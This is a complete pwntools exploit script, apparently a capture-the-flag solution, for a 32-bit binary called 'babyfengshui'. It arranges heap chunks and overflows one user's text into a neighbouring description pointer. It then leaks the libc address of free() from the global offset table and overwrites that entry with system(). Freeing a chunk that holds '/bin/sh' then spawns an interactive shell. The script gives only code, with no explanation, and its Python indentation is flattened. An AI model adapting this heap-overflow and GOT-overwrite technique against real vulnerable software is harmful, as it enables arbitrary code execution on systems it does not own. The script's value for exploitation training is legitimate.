from pwn import *
#context.log_level = 'debug'
def addUser(desc, name, text):
p.recvuntil('Action: ')
p.sendline('0')
p.recvuntil('size of description: ')
p.sendline(str(desc))
p.recvuntil('name: ')
p.sendline(name)
p.recvuntil('text length: ')
p.sendline(str(len(text)))
p.recvuntil('text: ')
p.sendline(text)
def delUser(idx):
p.recvuntil('Action: ')
p.sendline('1')
p.recvuntil('index: ')
p.sendline(str(idx))
def displayUser(idx):
p.recvuntil('Action: ')
p.sendline('2')
p.recvuntil('index:')
p.sendline(str(idx))
p.recvuntil('description: ')
addr = p.recvline()
return addr[:4]
def updateDesc(idx,size,text):
p.recvuntil('Action: ')
p.sendline('3')
p.recvuntil('index: ')
p.sendline(str(idx))
p.recvuntil('text length: ')
p.sendline(str(size))
p.recvuntil('text: ')
p.sendline(text)
p = process('./babyfengshui')
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
#Heap Feng Shui
addUser(10,'A'*10,'B'*10)
addUser(10,'A'*10,'B'*10)
addUser(len('/bin/sh'),'/bin/sh','/bin/sh')
#free()
delUser(0)
#Heap Overflow
addUser(120, 'HeapOverflow', 'A'*152+p32(0x804b010))
#Leak libc address
libcAddr = displayUser(1)
free = u32(libcAddr)
libcBase = free - libc.sym['free']
system = libcBase + libc.sym['system']
log.info('Libc base : '+hex(libcBase))
log.info('free() : '+hex(free))
log.info('system() : '+hex(system))
#Overwrite free.got
updateDesc(1,4,p32(system))
#system('/bin/sh')
delUser(2)
#Get shell
p.interactive() |